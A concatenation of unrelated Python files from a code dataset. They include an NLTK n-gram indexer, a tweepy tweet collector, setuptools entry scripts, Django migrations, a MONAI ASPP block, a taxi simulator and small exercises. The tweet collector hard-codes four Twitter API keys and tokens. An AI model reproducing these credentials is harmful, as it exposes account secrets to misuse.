] | cmitash@Chaitanyas-MacBook-Pro.local |
7ccba16fed70bdaf5f8693bbb478d49e5edd403b | f86e92e4287fd26d04f642b12269b893aa9c1c47 | /Indexer/Indexer/indexerVersion2NLTK.py | b2ad82f7a576c1434da1b6124a03dec57497641f | [] | no_license | mishraMe/InformationRetrival | b22ceea5f9c345616a20fb8fb792c78ecd59c652 | ba6f573ff6dac16a3aa97df92686d2ec7b41dc23 | refs/heads/master | 2021-01-11T14:56:41.911516 | 2017-03-15T07:01:03 | 2017-03-15T07:01:03 | 80,258,170 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py |
# This program creates an inverted index for an
#input corups
from nltk import word_tokenize
from nltk.util import ngrams
import os
import operator
from collections import OrderedDict
corpus_dir = "cleaned_content_dir/"
default_corpus = os.listdir(corpus_dir)
doc_token_count_dic = {}
def create_index(corpus, n_gram_val):
doc_token_dic = {}
for doc in corpus:
doc_file = open(corpus_dir + doc, 'r')
doc_data = doc_file.read()
tokens = word_tokenize(doc_data)
if n_gram_val == 1:
doc_token_dic[doc] = tokens
elif n_gram_val == 2:
bi_grams = ngrams(tokens, n_gram_val)
doc_token_dic[doc] = bi_grams
elif n_gram_val == 3:
tri_gram = ngrams(tokens, n_gram_val)
doc_token_dic[doc] = tri_gram
doc_file.close()
create_word_dic(doc_token_dic, n_gram_val)
def create_word_dic(doc_token_dic, n_gram_value):
word_dic = dict()
for each in doc_token_dic:
for word in doc_token_dic[each]:
if word in word_dic:
if each in word_dic[word]:
word_dic[word][each] += 1
else:
word_dic[word][each] = 1
else:
doc_dic = dict()
doc_dic[each] = 1
word_dic[word] = doc_dic
create_term_freq_table(word_dic, n_gram_value)
create_doc_freq_table(word_dic, n_gram_value)
def create_term_freq_table(word_dic, n_gram_val):
doc_val = 0
term_freq = {}
file_name = open(corpus_dir + "term_freq_table_for_"
+ str(n_gram_val) +"_ngrams", "w+")
for word in word_dic:
for doc in word_dic[word]:
doc_val += word_dic[word][doc]
term_freq[word] = doc_val
sorted_dict = list(sorted(term_freq.items(), key=lambda i: (i[1], i[0]), reverse=True))
for each in sorted_dict:
file_name.writelines("term -> " + str(each[0])
+ ", freq -> " + str(each[1]) + '\n')
file_name.close()
return 0
def create_doc_freq_table(word_dic, n_grams):
file_name = open(corpus_dir + "document_frequency_table_for_"
+ str(n_grams) + "_ngrams", "w+")
word_dic = OrderedDict(sorted(word_dic.items()))
for word in word_dic:
docs = word_dic[word]
doc_total = len(docs)
file_name.writelines("word -> " + str(word) + ", docs -> "
+ str(docs.keys()) + ",b doc_frequency "
+ str(doc_total) + '\n')
file_name.close()
return 0
#verifcation code prints the total count of term reference in the document
# for word in word_dic:
# if word == ('in', 'solar'):
# print word_dic[word]
# else:
# continue
def main():
n_gram_limit = 1
while n_gram_limit is not 4:
create_index(default_corpus, n_gram_limit)
n_gram_limit += 1
main()
| [
"mishraMe@husky.neu.edu"
] | mishraMe@husky.neu.edu |
c2725df0039eb171eae7a52b370b9bd27307605c | 888bad8f10370836d804ef0d7867872c8752149e | /collect_data.py | 308bf29ee6837d0ba4e92ac89da720120f98a39e | [] | no_license | wanyanxie/twitter_analysis | 9f8226201ef47aec3476788a4b9874369c30435c | 48aec5ad2f464722236203c09b40a41bb98ff727 | refs/heads/master | 2021-01-10T01:37:08.352370 | 2015-10-18T23:05:54 | 2015-10-18T23:05:54 | 44,427,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,396 | py | __author__ = 'wanyanxie'
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import re
import sys
import json
import dateutil.parser
from pytz import timezone
import pytz
import tweepy
import time
import urllib3
import random
import csv
import os
#Listener Class Override
class listener(StreamListener):
def __init__(self, start_time, time_limit):
self.time = start_time
self.limit = time_limit
self.lastID = None
#self.regex = re.compile('|'.join(keywords).lower())
def on_data(self, data):
# print time.time() - self.time
while (time.time() - self.time) < self.limit:
try:
tweet = json.loads(data)
if not tweet.has_key('id_str'):
#print 'No tweet ID - ignoring tweet.'
return True
#### ignore duplicates tweets
tweetID = tweet['id_str']
if tweetID != self.lastID:
self.lastID = tweet['id_str']
else:
return True
if not tweet.has_key('user'):
#print 'No user data - ignoring tweet.'
return True
user = tweet['user']['name']
text = parse_text(tweet['text'])
print text
# print user, text
### mathces the key words
# matches = re.search(self.regex, text.lower())
# if not matches:
# return True
#### remove the retweets
# if tweet['retweeted'] or 'RT @' in tweet['text']:
# return True
location = tweet['user']['location']
source = tweet['source']
d = dateutil.parser.parse(tweet['created_at'])
d_tz = pytz.timezone('UTC').normalize(d)
localtime = d.astimezone(timezone('US/Pacific'))
tmstr = localtime.strftime("%Y%m%d-%H:%M:%S")
#print tweetID, text
# saveFile = open('raw_tweets.json', 'a')
# saveFile.write(data)
# saveFile.write('\n')
# saveFile.close()
# append the hourly tweet file
with open('./data/tweets-%s.data' % tmstr.split(':')[0], 'a+') as f:
f.write(data)
geo = tweet['geo']
if geo and geo['type'] == 'Point':
coords = geo['coordinates']
else:
return True
#
with open('./data/data_geo.txt', 'a+') as f:
#f.write('tweetID,creat_time,Coord1,Coord2,Text')
print("%s,%s,%f,%f,%s" % (tweetID,tmstr,coords[0],coords[1],text))
f.write("%s,%s,%f,%f,%s\n" % (tweetID,tmstr,coords[0],coords[1],text))
except BaseException, e:
print 'failed ondata,', str(e)
time.sleep(5)
pass
except urllib3.exceptions.ReadTimeoutError, e:
print 'failed connection,', str(e)
time.sleep(5)
pass
exit()
def on_error(self, status):
print "error_message:", status
def parse_text(text):
"""
Read an txt file
Replace numbers, punctuation, tab, carriage return, newline with space
Normalize w in wordlist to lowercase
"""
text = text.encode('latin1', errors='ignore')
#text = text.rstrip('\n')
text = text.replace('\n', ' ')
return text
def read_csv(file):
data = []
with open(file) as f:
for line in f:
data.append(line.strip('\n').lower())
return data
def OAuth(consumer_key, consumer_secret, access_token, access_secret):
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
try:
redirect_url = auth.get_authorization_url()
print redirect_url
except tweepy.TweepError:
print 'Error! Failed to get request token.'
api = tweepy.API(auth)
print api.me().name
return auth
def main():
consumer_key = '7z0EH9KkaJOrMzzByX1KvZasd'
consumer_secret = 'AQ6wVGxj4sOLZJvtrIk7spX4STYyYoxYSSHVk81saoSWEQtjqB'
access_token = '1705070078-VqlcsHdn7Rz1RrXpB4ACn249g05NwgMI1fixNc8'
access_secret = '6qaVRAmCnVuJPcPJrxA0RlpmkCcGE6pJHq2HgdsJ1FWIo'
auth = OAuth(consumer_key, consumer_secret, access_token, access_secret)
start_time = time.time() #grabs the system time
time_limit = 10000
keywords = read_csv('candidates.txt')
print keywords
#keywords = ["happy", "sad"]
# print '|'.join(keywords).lower()
# keyword_list = random.sample(keywords, 300) #track list
#keyword_list = [keywords[i] for i in range(400)]
#print keyword_list
#keywords = ['traffic, accident, disabled vehicle, warning, emergency']
dir = 'data'
if not os.path.exists(dir):
os.makedirs(dir)
twitterStream = Stream(auth, listener(start_time, time_limit))
twitterStream.filter(track = keywords, languages=['en'])
if __name__ == '__main__':
main()
| [
"wanyanxie@gmail.com"
] | wanyanxie@gmail.com |
d6745bc1f0243c9c44de5992f1fda4a08325c905 | 17579f0f218f97e44b3dc279bc8db65e7ed841a2 | /venv/Scripts/sample-script.py | 7763e8147b45fb9979aa6d85da5a3301e6d50b02 | [] | no_license | sebidelamata/trumpVolatility | 680a821b7ddab054d5705a993bca04ca995984e1 | d405a626f0410751efae1f18d2da0dd16d96e2a5 | refs/heads/master | 2023-02-27T11:36:49.970811 | 2021-02-06T20:36:50 | 2021-02-06T20:36:50 | 296,694,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | #!c:\users\sebid\trumpvolatility\venv\scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'yfinance==0.1.55','console_scripts','sample'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'yfinance==0.1.55'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('yfinance==0.1.55', 'console_scripts', 'sample')())
| [
"delamatas@appstate.edu"
] | delamatas@appstate.edu |
b0f2fc3373b95a324d62f27a91b3d3751849e3f5 | 1d8cb12741d6b91fcb0a504bd4c3ec64a2bbe1f3 | /venv/bin/easy_install-3.7 | efbef1cc02bb85af667b3efaf94a99dd99838909 | [] | no_license | yvkschaefer/python_noteapp | fc2fdfded9214d4fec802f9e16590a7e0c3cec51 | 764a67ff249358353de38ade59d6fb6b527731d3 | refs/heads/master | 2020-03-24T12:13:55.464306 | 2018-07-29T23:01:17 | 2018-07-29T23:01:17 | 142,708,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | 7 | #!/Users/kschaefer/Documents/code/python/noteapp/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"yvkschaefer@gmail.com"
] | yvkschaefer@gmail.com |
8091533695375b2f5eb6cba07fab911661f8d013 | 1cb515d0742759441cfeed931d0a106a7387a447 | /migrations/0002_auto_20141209_1820.py | a947da605f470f19a9aae24d2d63d4e292db9b24 | [] | no_license | oscfr657/shortener | dbe2e26682c4ff9f008cdd57f8edbe8598a02bcb | 4b8ad2d41b39aac885eff20ea8c0115cc6ac3b97 | refs/heads/master | 2021-01-19T13:01:19.054791 | 2014-12-29T18:32:44 | 2014-12-29T18:32:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('urlshortener', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='shorturl',
name='url',
field=models.URLField(max_length=256, unique=True, null=True, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='shorturl',
name='word',
field=models.CharField(unique=True, max_length=64),
preserve_default=True,
),
]
| [
"oscfr657@gmail.com"
] | oscfr657@gmail.com |
92d98e90faf1053ca2441ede6fdf9f7c3f4bf716 | d3d4cf92a5fc67a2e2e334896621217cb9015452 | /monai/networks/blocks/aspp.py | 5fbe6a89064d25f86fc743223e996b47b598cac0 | [
"Apache-2.0"
] | permissive | yaritzabg/MONAI | fe6271a274c2906e8cc5573ab00821dd4a30b330 | 18c33981e600d5704b1f8d208186c254e30dd3df | refs/heads/master | 2022-11-10T23:45:38.038630 | 2020-07-02T17:52:14 | 2020-07-02T17:52:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,593 | py | # Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from monai.networks.blocks.convolutions import Convolution
from monai.networks.layers import same_padding
from monai.networks.layers.factories import Act, Conv, Norm
class SimpleASPP(nn.Module):
"""
A simplified version of the atrous spatial pyramid pooling (ASPP) module.
Chen et al., Encoder-Decoder with Atrous Separable Convolution for Semantic Image Segmentation.
https://arxiv.org/abs/1802.02611
Wang et al., A Noise-robust Framework for Automatic Segmentation of COVID-19 Pneumonia Lesions
from CT Images. https://ieeexplore.ieee.org/document/9109297
"""
def __init__(
self,
spatial_dims: int,
in_channels: int,
conv_out_channels: int,
kernel_sizes=(1, 3, 3, 3),
dilations=(1, 2, 4, 6),
norm_type=Norm.BATCH,
acti_type=Act.LEAKYRELU,
):
"""
Args:
spatial_dims: number of spatial dimensions, could be 1, 2, or 3.
in_channels: number of input channels.
conv_out_channels: number of output channels of each atrous conv.
The final number of output channels is conv_out_channels * len(kernel_sizes).
kernel_sizes: a sequence of four convolutional kernel sizes.
Defaults to (1, 3, 3, 3) for four (dilated) convolutions.
dilations: a sequence of four convolutional dilation parameters.
Defaults to (1, 2, 4, 6) for four (dilated) convolutions.
norm_type: final kernel-size-one convolution normalization type.
Defaults to batch norm.
acti_type: final kernel-size-one convolution activation type.
Defaults to leaky ReLU.
Raises:
ValueError: len(kernel_sizes) and len(dilations) must be the same.
"""
super().__init__()
if len(kernel_sizes) != len(dilations):
raise ValueError("len(kernel_sizes) and len(dilations) must be the same.")
pads = tuple(same_padding(k, d) for k, d in zip(kernel_sizes, dilations))
self.convs = nn.ModuleList()
for k, d, p in zip(kernel_sizes, dilations, pads):
_conv = Conv[Conv.CONV, spatial_dims](
in_channels=in_channels, out_channels=conv_out_channels, kernel_size=k, dilation=d, padding=p
)
self.convs.append(_conv)
out_channels = conv_out_channels * len(pads) # final conv. output channels
self.conv_k1 = Convolution(
dimensions=spatial_dims,
in_channels=out_channels,
out_channels=out_channels,
kernel_size=1,
act=acti_type,
norm=norm_type,
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""
Args:
x: in shape (batch, channel, spatial_1[, spatial_2, ...]).
"""
x_out = torch.cat([conv(x) for conv in self.convs], dim=1)
x_out = self.conv_k1(x_out)
return x_out
| [
"noreply@github.com"
] | noreply@github.com |
df977b7393b24ca1ad477917ec83da57172a7542 | 2e395913f297389e8afdc99738b5ee7f6af20bb7 | /django project/New folder/myproj/myapp/migrations/0003_auto_20200620_1052.py | 06c507915d2fccd0d061928827ae0dcafb3133d7 | [] | no_license | Jagdar/demo_napp | 4089bcfabd27689e6463eebbc40def6cf257599e | c1c42d7c3fa68a67c4e84cf622a3892f9bbed711 | refs/heads/master | 2022-11-16T16:03:41.591506 | 2020-07-16T04:36:54 | 2020-07-16T04:36:54 | 266,512,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | # Generated by Django 3.0.7 on 2020-06-20 17:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0002_qaa'),
]
operations = [
migrations.RenameField(
model_name='qaa',
old_name='questions',
new_name='question',
),
migrations.AlterField(
model_name='qaa',
name='lang',
field=models.CharField(choices=[('j', 'java'), ('p', 'python'), ('c', 'C prog')], max_length=1),
),
]
| [
"65850358+Jagdar@users.noreply.github.com"
] | 65850358+Jagdar@users.noreply.github.com |
46c35a9237b2d46b850eca504e33651a556162ee | b7e7f7fd6150b5bb9237929bacb0ead18fac46bc | /Mechanics/PagesManager.py | f652e39fd3582e82882b6d7ede84424b5bb4c27f | [] | no_license | babochkin-prod/FindCall | 18e9d02a5039335132e71d56489409d189536ec6 | beaae5fe5aa12f360dde744d78edc9d4599eebbd | refs/heads/main | 2023-03-31T02:30:52.532327 | 2021-04-05T18:22:21 | 2021-04-05T18:22:21 | 352,095,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,840 | py | import json
import os
from DATABASE import sqlighter
from Settings import *
#Импорт страниц
'''
Разметка клавиатуры
{'inline': [[], []], 'keyboard': [[{'text': 'text', 'color': 'negative'},], []]}
'''
pages = {}
def Pages_Connect(path, delimiter = '\\'):
for file_name in os.listdir(path):
str_import_from = path.replace('{}'.format(delimiter), '.').replace('..', '.')
if(str_import_from[-1] == '.'):
str_import_from = str_import_from[0: -1]
if(file_name != '__pycache__') and (file_name != 'STANDART.py'):
file=os.path.join(path,file_name)
# Если это папка
if os.path.isdir(file):
com = 'from {} import {}'.format(str_import_from, file_name)
exec(com)
Pages_Connect('{}{}{}'.format(path, delimiter, file_name))
# Если это файл
else:
if(file_name[-3:] == '.py'):
file_name = file_name[:-3]
# Импорт скрипта
com = 'from {} import {}'.format(str_import_from, file_name)
exec(com)
# Занесение ссылки на страницу в список страниц
com = 'pages.update({1} {0}.{0}().pageName: {0}.{0}() {2})'.format(file_name, '{', '}')
exec(com)
# Автоматическое подключение страниц
delimiter = '\\'
path = 'Pages{}'.format(delimiter)
print('Start loading pages...')
Pages_Connect(path, delimiter)
print('Pages loaded.')
# Сообщения при старте бота
def start_messages():
answers = []
page = '-'
for i in START_MESSAGES:
answers.append({'type': '-', 'text': i, 'media': []})
return answers
#------------------------------------- Выборка страницы -------------------------------------
def Keyboard_keyboards(app_from, page, user_id):
keyboard_request = pages[page].Keyboard(app_from, user_id)
return keyboard_request
#--------------------------------------------------------------------------------------------
#------------------------------------- Обработчик нажатий -------------------------------------
def Keyboard_Events(app_from, page, user_id, data):
p_ = [page]
if(data == 'ПОМОГИ') or (data == '🆘'):
sqlighter.set_user_data(app_from = app_from, user_id = user_id, line = 'data', data = '')
return ['main']
if not(page in pages):
page = STANDART_PAGE
sqlighter.set_data(table_name = 'users', line = 'page', line_selector = 'user_id_{}'.format(app_from), line_selector_value = user_id, data = page)
p_ = pages[page].Keyboard_Events(app_from, user_id, data)
if(p_ == '-'):
p_ = pages[page].Ansver(app_from, user_id)
return p_
#----------------------------------------------------------------------------------------------
#------------------------------------- Ответ -------------------------------------
def Keyboard_Ansver(page, app_from, user_id):
return pages[page].Ansver(app_from, user_id)
#---------------------------------------------------------------------------------
#------------------------------------ Медиосообщение ------------------------------------
def Media_Message(app_from, user_id, page, media_data):
p_ = [page]
try:
p_ = pages[page].Media_Message(app_from, user_id, media_data)
except Exception as e:
print(e)
if(p_ != '-'):
return p_
else:
return [page]
#----------------------------------------------------------------------------------------
#------------------------------------ Аудиосообщение ------------------------------------
def Audio_Message(app_from, user_id, page, audio_data):
p_ = [page]
try:
p_ = pages[page].Audio_Message(app_from, user_id, audio_data)
except Exception as e:
pass
if(p_ != '-'):
return p_
else:
return [page]
#---------------------------------------------------------------------------------------- | [
"68076247+babochkin-prod@users.noreply.github.com"
] | 68076247+babochkin-prod@users.noreply.github.com |
d42bf811b38b3d684e023ba06091ebcf353addd5 | 9751db1d14ef58a58c54f97721d67431a5b067a8 | /DLFCV/perceptron_or.py | 58b5c29478685e455f8130062daab80cba5f1fbe | [] | no_license | ken2190/ProgramPractice | fad67aff7874239d88e64129cbfb23e42892d6e7 | 31a7e8ddbbc81bb7712cbc1e9dd17da3c278db84 | refs/heads/master | 2023-03-23T02:14:59.775412 | 2019-08-28T06:27:48 | 2019-08-28T06:27:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | #
# Fit Perceptron model to the bitwise OR dataset
# a: zhonghy
# date: 2018-7-19
#
# import the necessary packages
from pyimagesearch.nn.perceptron import Perceptron
import numpy as np
# construct the OR dataset
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
y = np.array([[0], [1], [1], [1]])
# define our perceptron and train it
print("[INFO] training perceptron...")
p = Perceptron(X.shape[1], alpha=0.1)
p.fit(X, y, epochs=20)
# now that our perceptron is trained we can evaluate it
print("[INFO] testing preceptron...")
# now that our network is trained, loop over the data points
for (x, target) in zip(X, y):
# make a prediction on the data point and display the result
# to our console
pred = p.predict(x)
print("[INFO] data={}, ground-truth={}, pred={}".format(
x, target[0], pred))
| [
"530634028@qq.com"
] | 530634028@qq.com |
8640a9beee2db350e17734b1c6aea157fd54d3dc | a91053e849189be233e774b3d410a0fc85b570f3 | /project/urls.py | d019359613cb7fe73fa6c5b98e4e447df685f431 | [] | no_license | AnthonyDeniau/biller | 3496a90050cf05ca5e43b483a314bd136bc7c913 | 8d471df5b23f839bb0ea37396f4586463643424f | refs/heads/master | 2020-04-01T16:50:25.771063 | 2018-10-18T06:10:29 | 2018-10-18T06:10:29 | 153,400,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """biller URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"anthony.deniau@gmail.com"
] | anthony.deniau@gmail.com |
12df0fae41407a4524a513b2dbd44b58de10142c | 00593fc129ee9443e9456a4c6dd194bd53474ed6 | /few-shot/models.py | e75b217c91fec649939280ad83602375701e85e8 | [
"MIT"
] | permissive | cititude/Media-and-Cognition-Homework | 3b7217f9c0fe4c45309ac25baa7aec1e17e90234 | dabaaef6d8ec115171e7115731c5f76b518d9bde | refs/heads/master | 2022-11-20T10:34:51.120231 | 2020-06-27T13:54:36 | 2020-06-27T13:54:36 | 252,416,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,719 | py | import torch
from torch import nn
from torch.autograd import Variable
from sedense import *
class Reptile(nn.Module):
def __init__(self):
nn.Module.__init__(self)
def point_grad_to(self, target):
'''
Set .grad attribute of each parameter to be proportional
to the difference between self and target
'''
for p, target_p in zip(self.parameters(), target.parameters()):
if p.grad is None:
if self.is_cuda():
p.grad = Variable(torch.zeros(p.size())).cuda()
else:
p.grad = Variable(torch.zeros(p.size()))
p.grad.data.add_(p.data - target_p.data)
def is_cuda(self):
return next(self.parameters()).is_cuda
class Meta_Model(Reptile):
def __init__(self, num_classes=11):
Reptile.__init__(self)
self.num_classes = num_classes
self.classifier=SEDenseNet(num_classes=num_classes)
def forward(self, x):
out = x.view(-1, 3, 224, 224)
out = self.classifier(out)
return out
def predict(self, prob):
__, argmax = prob.max(1)
return argmax
def clone(self):
clone = Meta_Model(self.num_classes)
clone.load_state_dict(self.state_dict())
if self.is_cuda():
clone.cuda()
return clone
def load_pretrained_state_dict(self,pretrained_state_dict):
self_state_dict=self.classifier.state_dict()
pretrained_state_dict={k:v for k,v in pretrained_state_dict.items() if (k in self_state_dict and "classifier" not in k)}
self_state_dict.update(pretrained_state_dict)
self.classifier.load_state_dict(self_state_dict)
| [
"3223781449@qq.com"
] | 3223781449@qq.com |
83be0eb13d11e962804f49073a705f18cebb52b5 | e242ccd5bab549776d15a94f94603f605039afac | /myEvent/urls.py | e0ff65aa84705c24c27b8a91fb84ae99e3c54144 | [] | no_license | jose-carrasco/django_weeding_template | 85e8e57fc051d6c84cc9ca4c2ef50d74a0d784a6 | 32f8a1c3e08919860216a8a79fa28678256e6c0f | refs/heads/master | 2023-03-03T12:59:08.373100 | 2015-04-16T17:55:47 | 2015-04-16T17:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from myEvent import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^hoteles', views.hotels, name='hotels'),
url(r'^mesa_de_regalos', views.giftstable, name='giftstable'),
url(r'^confirmacion', views.confirm, name='confirm'),
url(r'^comparte_tus_fotos', views.photos, name='photos'),
url(r'^register', views.register, name='register'),
) | [
"jcarrasco@digitalartsnetwork.com.mx"
] | jcarrasco@digitalartsnetwork.com.mx |
ff7332969d1eb61a67b9706650a536ba16ef14a4 | 14198fd6549fe8d9d420bcd4d0730535c3dfbe7e | /prac_08/taxi_simulator.py | 545faa6c7f5c2086966830b124059dc47f85cfbc | [] | no_license | IoAdhitama/CP1404 | b8336df5f9633dc5d09125817577210d23172a0b | afe1d62b5f8cb1da68387796449fa62bc2f55783 | refs/heads/master | 2020-04-07T11:20:38.134203 | 2018-12-29T03:20:16 | 2018-12-29T03:20:16 | 158,322,158 | 0 | 0 | null | 2018-12-11T03:41:17 | 2018-11-20T02:54:36 | Python | UTF-8 | Python | false | false | 1,404 | py | from prac_08.taxi import Taxi
from prac_08.silver_service_taxi import SilverServiceTaxi
MENU = """q)uit, c)hoose taxi, d)rive
>>> """
def main():
user_input = ""
taxi_used = 0
current_bill = 0
taxis = [Taxi("Prius", 100), SilverServiceTaxi("Limo", 100, 2),
SilverServiceTaxi("Hummer", 200, 4)]
print("Let's Drive!")
while user_input != "q":
user_input = str(input(MENU)).lower()
if user_input == "c":
print("Taxis available:")
for i in range(len(taxis)):
print("{} - {}".format(i, taxis[i]))
try:
taxi_used = int(input("Choose taxi: "))
taxis[taxi_used].start_fare()
except ValueError:
print("Invalid input.")
if user_input == "d":
try:
distance = int(input("Drive how far? "))
taxis[taxi_used].drive(distance)
print("Your {} trip cost you ${}".format(taxis[taxi_used].name, taxis[taxi_used].get_fare()))
current_bill += taxis[taxi_used].get_fare()
except ValueError:
print("Invalid input.")
print("Bill to date: ${}".format(current_bill))
print("Total trip cost: ${}".format(current_bill))
print("Taxis are now:")
for i in range(len(taxis)):
print("{} - {}".format(i, taxis[i]))
main()
| [
"spicyicedtea@gmail.com"
] | spicyicedtea@gmail.com |
69c0bb652daa62eea8c9a6a5378fd562629cf26a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03095/s108733747.py | 8493da82e83df4f2a53a5e799e1313b9f63c0471 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,818 | py | import sys
import math
from collections import Counter
N = int(input())
S = input()
MOD = 1000000007
# baba
# a(2), b(2), ab(1), ba(3)
# baab
# a(2), b(2), ab(2), ba(2)
# 1文字の時は分かる、それは単に数えるだけ
# 2文字の時は?
# 'ab' 'a'どれ選ぶ? → その後ろにある'b'は…
# 全部やるなら2^100000、ムリー
# dpいけるか?
# dpを設計しよう
# dp[n] : n文字目まで見た時の答え
# dp[n] = dp[n-1]
# baab
# dp[0] = 1 (b)
# dp[1] = dp[0]((b)のみ選ぶ) + 1(aのみ選ぶ) + dp[0] * 1 (ab)
# それが新しい文字なら?
# dp[n] = dp[n-1](追加で選ばない) + dp[n-1](選ぶ) + 1
# それが見たことある文字なら?
# 1文字単位では増えない
# n文字単位なら、pickする選択肢が増える
# ba (3)
# baa → 3 + 1?
# dp[n] = dp[n] (そのまま) + 最後の文字を使う
# 最後の文字を使うならどうなるか? → それ以外の種類の文字でつくるんだけど大変じゃない????
# baba
# babで5 a, b(2), ab(1) ba(1)
# 最後の文字を使うなら、bをどちらか選ぶ (か、何も選ばない)
# bをpickするか? * どれをpickするか?
# bをpickしない場合(1) + bをpickする場合(どれを選ぶ?)
# (1 + 2)
# abca
# abcで6 a, b, c, ab, ac, bc
# 最後の文字を使うなら、残りのbcの組み合わせ
# bをpickする/しない * cをpickする/しない 4通り?
ans = 1
counter = Counter()
counter[S[0]] += 1
for ch in S[1:]:
if ch in counter:
tmp = 1
for k, cnt in counter.items():
if k == ch:
continue
tmp = (tmp * (1 + cnt)) % MOD
ans = (ans + tmp) % MOD
counter[ch] += 1
else:
ans = (2 * ans) % MOD
ans = (ans + 1) % MOD
counter[ch] += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
1b8cebda853f471998deaecde0f755376fac2db7 | bb0a9ad70e17dc7b2f623f82b74030c1d73a8a82 | /hello/urls.py | 965cc5efa92fb2ccfef64da01659c5a3479b74cd | [] | no_license | 28kayak/django_tutorial_app | 00d6f8321376163bc2591dff114cafe8d9b6e2b4 | 28f5cf5c2dbaae4928f6cce948b8fe8e886b7999 | refs/heads/master | 2020-03-22T07:19:00.906056 | 2018-07-08T10:44:20 | 2018-07-08T10:44:20 | 139,692,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from django.urls import path
from . import views
urlpatterns = [
#path("", views.index, name="index"),
#path('<int:id>/<nickname>/',views.index, name='index'),
path('', views.index, name='index'), #path used by index.html in templates
path('next', views.next, name='next'),
path('form', views.form, name='form'),
] | [
"kaya.ota@gmail.com"
] | kaya.ota@gmail.com |
47bf2f00c6730182259d81aeab1bf82ce408ef5d | c7115a0a1470310792b81cd097e0aa47ed095195 | /django_thoughtapi/manage.py | 5045eb05410e0449491ad1e7a92edec2a1f3c746 | [
"MIT"
] | permissive | qwergram/thoughts_api | 80818424b3755f671cfb65fcddff5c0769fa9e27 | 47e9a76cc15e30c36232b253eb0e44bb5f401482 | refs/heads/master | 2020-12-24T22:29:12.401158 | 2016-04-30T22:45:20 | 2016-04-30T22:45:20 | 57,338,528 | 0 | 0 | null | 2016-04-29T23:40:38 | 2016-04-28T22:46:59 | null | UTF-8 | Python | false | false | 260 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_thoughtapi.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"npengra317@gmail.com"
] | npengra317@gmail.com |
